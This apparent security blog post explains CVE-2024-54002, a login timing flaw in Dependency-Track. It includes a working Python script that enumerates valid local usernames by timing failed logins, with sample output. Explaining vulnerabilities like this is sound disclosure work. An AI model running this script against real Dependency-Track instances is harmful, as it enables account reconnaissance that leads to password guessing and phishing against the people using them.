CVE-2024-54002 - Exploiting a Timing Attack in Dependency-Track’s Login Endpoint
Dependency-Track is a popular open-source tool that helps companies detect risks in their software supply chain by tracking dependencies and vulnerabilities. In June 2024, a new vulnerability was identified, tracked as CVE-2024-54002, that exposes a subtle but serious risk: attackers can discover usernames registered on a Dependency-Track instance by measuring how long it takes for the login endpoint to respond.
In this post, we’ll break down what this vulnerability is, how it works, how to exploit it, and how to protect yourself. We’ll even include relevant code snippets and references. This is an exclusive, simple explanation for newcomers and seasoned defenders alike.
What’s the Vulnerability? (In Simple Terms)
When you try to log in to Dependency-Track, you send a request to the endpoint /api/v1/user/login with your username and password. If you enter a username that really exists, the system takes longer to answer than if you try with a username that does not exist. This is called a timing discrepancy.
Attackers can use this time difference to guess — or enumerate — which usernames are valid in the system. Once they have a list of valid usernames, they can try password attacks, phishing, or other methods.
> LDAP and OpenID Connect users are safe — only "local" users (managed internally by Dependency-Track) are affected.
Let’s look at an example
- A request to /api/v1/user/login with a username like admin takes about 500ms to fail (wrong password, but username is valid).
- A request with a username like nonexistentuser fails instantly, say, in 100ms (username not found).
If the attacker sends hundreds of requests and measures the times, they can figure out which usernames are "real" just by watching for the longer response.
Demonstration Code: Timing Attack Script
This simple Python script tests usernames for the vulnerability. Substitute your Dependency-Track URL.
import requests
import time
TARGET = "https://your-dependencytrack.com/api/v1/user/login";
# Replace with real or guessed usernames
usernames = ["admin", "root", "jdoe", "nonexistent"]
for username in usernames:
data = {"username": username, "password": "WrongPass123!"}
start = time.time()
response = requests.post(TARGET, json=data)
elapsed = time.time() - start
print(f"Username: {username} | Status: {response.status_code} | Time: {elapsed:.3f}s")
Expected output
Username: admin | Status: 401 | Time: .504s
Username: root | Status: 401 | Time: .499s
Username: jdoe | Status: 401 | Time: .110s
Username: nonexistent | Status: 401 | Time: .105s
You’ll notice the valid usernames (admin, root) take longer to fail.
Who’s NOT Affected?
- LDAP and OpenID Connect users are not impacted. The timing gap only occurs for "internal" (managed) user accounts.
References and Further Reading
- Official CVE record for CVE-2024-54002
- Dependency-Track GitHub Security Advisory
- Dependency-Track Release v4.12.2 Notes
- OWASP Timing Attacks Explained
Final Words
Timing attacks like CVE-2024-54002 show how even tiny differences in code behavior can spill secrets to attackers. This flaw makes it possible to collect usernames from a Dependency-Track instance with very little effort. If you manage one, update to 4.12.2 now, and always keep an eye on your user authentication logic!
Have thoughts or fixes to share? Leave a comment below — and pass this info to any team still running old Dependency-Track versions. Stay safe!
Timeline
Published on: 12/04/2024 16:15:26 UTC